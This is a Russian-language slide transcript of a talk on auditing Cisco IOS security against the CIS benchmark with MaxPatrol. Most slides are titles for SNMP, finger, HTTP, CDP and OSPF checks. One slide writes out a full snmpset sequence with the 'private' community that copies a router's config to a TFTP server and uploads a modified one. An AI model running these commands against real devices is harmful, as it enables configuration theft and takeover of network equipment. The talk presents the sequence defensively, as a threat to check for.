Сканирование cisco ios в maxpatrol
DESCRIPTION
Сканирование Cisco IOS в MaxPatrol. Сафронов Илья. What’s the deal?. Безопасность сетевых устройств ( Cisco IOS ) Стандарты безопасности Контроль за соответствием стандартам безопасности. Cisco security hardening. Комплексный подход к безопасности устройств Cisco. - PowerPoint PPT PresentationTRANSCRIPT
![Page 1: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/1.jpg)
![Page 2: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/2.jpg)
Сканирование Cisco IOS в MaxPatrol
Сафронов Илья
![Page 3: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/3.jpg)
What’s the deal?― Безопасность сетевых устройств (Cisco IOS)― Стандарты безопасности― Контроль за соответствием стандартам
безопасности
![Page 4: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/4.jpg)
Cisco security hardening― Комплексный подход к безопасности устройств
Cisco.• Management Plane (управляющий IOS’ом трафик
(SSH, SNMP))• Control Plane (трафик управления сетью (BGP,
STP))• Data Plane ( проходящие сквозь устройство
данные)
![Page 5: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/5.jpg)
Security benchmarking-CIS
Рекомендации и стандарты по безопасности оборудования и ПО.
![Page 6: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/6.jpg)
CIS – Cisco IOS
― Бенчмарк по безопасности для Cisco IOS
![Page 7: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/7.jpg)
CIS – Cisco IOSГруппы проверок:
― AAA― SNMP― Global services (CDP, DHCP, HTTP)― Logging― Neighbor authentication (EIGRP, OSPF, RIP)
![Page 8: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/8.jpg)
Как проверить?― Max Patrol
![Page 9: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/9.jpg)
Чего бояться?
![Page 10: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/10.jpg)
Проверка SNMP
![Page 11: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/11.jpg)
Настройки на устройстве
![Page 12: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/12.jpg)
Угроза – Snmpwalk enumeration
![Page 13: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/13.jpg)
Угроза - Копирование файла конфигурации через SNMP
TFTP-сервер
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.666 integer 4snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.666 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.666 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.666 string victim-config
snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.666 integer 1
///Возврат модифицированного файла конфигурации (startup-config) //обратно на устройствоsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.2.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.3.670 integer 1snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.4.670 integer 3snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.5.670 address <адрес TFTP-сервера>.snmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.6.670 string victim-configsnmpset -v 1 -c private <device name> .1.3.6.1.4.1.9.9.96.1.1.1.1.14.670 integer 1//Перезагрузка устройства для применения изменений
![Page 14: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/14.jpg)
Решение?
![Page 15: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/15.jpg)
Проверка finger
![Page 16: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/16.jpg)
Настройки на устройстве
![Page 17: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/17.jpg)
Угроза – login enumeration
![Page 18: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/18.jpg)
Решение?
![Page 19: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/19.jpg)
Проверка HTTP
![Page 20: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/20.jpg)
Настройки на устройстве
![Page 21: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/21.jpg)
Угроза – кража учетных данных
![Page 22: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/22.jpg)
Решение ?
![Page 23: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/23.jpg)
Проверка CDP
![Page 24: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/24.jpg)
Настройки на устройстве
![Page 25: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/25.jpg)
Угроза - Enumeration через CDP
![Page 26: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/26.jpg)
Решение ?
![Page 27: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/27.jpg)
Аутентификация OSPF
![Page 28: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/28.jpg)
Настройки на устройстве
![Page 29: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/29.jpg)
Угроза – «Отравление» таблиц маршрутизации
![Page 30: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/30.jpg)
Решение?
![Page 31: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/31.jpg)
Кастомный стандарт― Не нравится / не подходит стандарт?― Собери свой!
![Page 32: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/32.jpg)
Заключение― Защищайте свои сетевые устройства― Следите за стандартами безопасности― Регулярно проводите аудит сети
![Page 34: Сканирование Cisco IOS в MaxPatrol](https://reader035.vdocuments.pub/reader035/viewer/2022062301/568133d8550346895d9acf46/html5/thumbnails/34.jpg)